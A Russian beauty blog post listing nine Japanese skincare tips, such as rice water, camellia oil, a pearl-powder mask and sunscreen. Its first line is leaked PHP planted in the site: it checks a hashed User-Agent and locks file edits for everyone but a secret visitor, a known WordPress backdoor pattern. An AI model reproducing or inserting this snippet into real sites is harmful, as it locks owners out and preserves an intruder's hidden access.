if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } 9 секретов красоты из Японии | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

9 секретов красоты из Японии

Каждая женщина мечтает иметь нежную и бархатистую кожу с ровным матовым цветом. Особенно это касается кожи на лице. Можно только позавидовать практически идеальному цвету лица японок. На самом деле научиться у них ухаживать за своим лицом вполне возможно. В статье вы увидите 9 советов на эту тему от японских красавиц.

Каж­дая жен­щи­на меч­та­ет иметь неж­ную и бар­ха­ти­стую кожу с ров­ным мато­вым цве­том. Осо­бен­но это каса­ет­ся кожи на лице. Мож­но толь­ко поза­ви­до­вать прак­ти­че­ски иде­аль­но­му цве­ту лица япо­нок. Их кожа заво­ра­жи­ва­ет муж­чин и вызы­ва­ет жгу­чую зависть у жен­щин. На самом деле научить­ся у них уха­жи­вать за сво­им лицом вполне воз­мож­но. В ста­тье вы уви­ди­те 10 сове­тов на эту тему от япон­ских красавиц.

Совет №1. Красота требует жертв

3d6cde37afa2278e85a300ad021993c010822f3c-1Эту фра­зу слы­шал, навер­ное, каж­дый. Одной из таких жертв может стать огром­ный запас вре­ме­ни, кото­рый сле­ду­ет тра­тить на свой внеш­ний вид. К при­ме­ру, сред­няя 43-лет­няя япон­ка, кото­рой на вид не дашь боль­ше 25-ти, тра­тит на свой облик до 5 часов в день! Разу­ме­ет­ся, это не по силам совре­мен­ным дело­вым девуш­кам, но выде­лить на уход за кожей­ли­ца минут 50–60 вполне реально.

Важ­но пом­нить, что любые нега­тив­ные сле­ды, появив­ши­е­ся на вашем лице, это не что иное, как послед­ствия более глу­бо­ких про­цес­сов, про­те­ка­ю­щих в орга­низ­ме. Состо­я­ние кожи напря­мую зави­сит от здо­ро­вья внут­рен­них орга­нов, пра­виль­но­го пита­ния и пси­хи­че­ско­го спо­кой­ствия. Душев­ная гар­мо­ния – это тоже нема­ло­важ­ный фак­тор кра­со­ты тела. Ведь не зря ази­а­ты ста­вят на пер­вое место душу, а не тело.

Совет №2. Рис – это не только вкусный гарнир

f_17939833Целеб­ные свой­ства риса извест­ны каж­дой житель­ни­це Япо­нии. Но ока­зы­ва­ет­ся, его поло­жи­тель­ное вли­я­ние не огра­ни­чи­ва­ет­ся одной толь­ко поль­зой для пище­ва­ри­тель­ной систе­мы. Рис может помочь вам под­дер­жать свою кожу белой, мато­вой и бар­ха­ти­стой. Возь­ми­те с собой в душ отвар риса и нане­си­те его на кожу. Резуль­тат вас при­ят­но удивит.

Совет №3. Лечебная косметика

Как ни стран­но не обя­за­тель­но тра­тить на свою кра­со­ту огром­ное состо­я­ние. Зача­стую самые полез­ные и при­ят­ные для кожи сред­ства сто­ят совсем не доро­го и нахо­дят­ся у нас под носом. При­об­ре­ти­те мас­ло каме­лии для того, что­бы под­дер­жать свою моло­дость и кра­со­ту на нуж­ном уровне. Оно помо­жет вам побо­роть­ся с мор­щи­на­ми и сухо­стью. Нико­гда не пре­не­бре­гай­те нату­раль­ной кос­ме­ти­кой сво­и­ми рука­ми. Обыч­но имен­но такие сред­ства таят в себе огром­ное коли­че­ство пита­тель­ных веществ.

Совет №4. Следите за тем, что пьете

Для уто­ле­ния жаж­ды жите­ли Азии пред­по­чи­та­ют зеле­ный и белый чай. И пра­виль­но дела­ют! Эти напит­ки бла­го­твор­но вли­я­ют на здо­ро­вье и внеш­ний вид кожи. К тому же их мож­но исполь­зо­вать для очи­ще­ния и ухо­да кожи лица вокруг глаз.

Совет №5. Косметика в домашних условиях

1406228065

Одним из сек­ре­тов кра­со­ты япон­ских дам явля­ют­ся жем­чуж­ные бели­ла. Они исполь­зу­ют их для при­го­тов­ле­ния спе­ци­аль­ной мас­ки. Она помо­жет вам сде­лать кожу мато­вой, выров­нять ее цвет и изба­вить от раз­дра­же­ний и вос­па­ле­ний. Для дости­же­ния луч­ше­го эффек­та важ­но при­ме­нять эту мас­ку регу­ляр­но. Ее состав доволь­но прост: жем­чуж­ный поро­шок, вода, мед ака­ции и яич­ный жел­ток. Смесь из всех этих ком­по­нен­тов нуж­но нане­сти на лицо при­мер­но на 20 минут. После это­го акку­рат­но смыть водой и насла­ждать­ся бар­ха­ти­стой кожей с ров­ным цве­том лица.

Совет №6. Здоровое питание

Как уже было выше ска­за­но, белиз­на и кра­со­та кожи лица напря­мую зави­сят от пра­виль­но­го пита­ния и ухо­да за здо­ро­вьем все­го тела. Важ­ным ком­по­нен­том это­го фак­то­ра явля­ет­ся пра­виль­ное пита­ние. Так что в первую оче­редь необ­хо­ди­мо сле­дить за вашим еже­днев­ным раци­о­ном, кото­рый дол­жен вклю­чать в себя про­дук­ты бога­тые ами­но­кис­ло­та­ми, мини­мум жиров и рис. Ведь не зря кра­си­вые Япон­ки не могут про­ве­сти день без раз­но­об­раз­ных про­дук­тов с рисом.

Совет №7. Массаж как средство расслабления и омоложения

Все ази­ат­ки пре­крас­но пони­ма­ют, как поле­зен и при­я­тен лечеб­ный мас­саж. Он акти­ви­зи­ру­ет энер­гию все­го тела, повы­ша­ет упру­гость и эла­стич­ность мышц и уси­ли­ва­ет кро­вя­ной при­ток к верх­ним сло­ям эпи­дер­ми­са. Кро­ме того, про­фес­си­о­наль­ный мас­саж может очень поло­жи­тель­но повли­ять на био­ло­ги­че­ски актив­ные точ­ки, при этом пода­рив ваше­му телу допол­ни­тель­ный заряд бод­ро­сти, све­же­сти и молодости.

Совет №8. Бережная защита кожи от солнца

Уход за кожей лица вклю­ча­ет в себя не толь­ко еже­днев­ное умы­ва­ние и сня­тие маки­я­жа перед сном. Наша кожа очень чув­стви­тель­на к воз­дей­ствию уль­тра­фи­о­ле­то­вых лучей. Поэто­му что­бы защи­тить ее от них необ­хо­ди­мо перед каж­дым выхо­дом на ули­цу осо­бен­но в лет­ний пери­од нане­сти на лицо спе­ци­аль­ный защит­ный крем.

Совет №9. Не увлекайтесь косметикой

Всем извест­но, что чрез­мер­ное исполь­зо­ва­ние кос­ме­ти­ки заби­ва­ет поры на коже лица. Тем самым, скры­вая мел­кие неров­но­сти и недо­стат­ки, вы толь­ко усу­гу­би­те про­бле­му и повре­ди­те вашу пре­крас­ную кожу. Исполь­зуй­те кос­ме­ти­ку по мини­му­му, и ваше лицо отве­тит благодарностью.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Ангелина Левковская

Увлекаюсь косметологией. Особенно интересно делать своими руками разные кремчики, масочки, лосьончики... ммм, класс! Читайте все мои записи!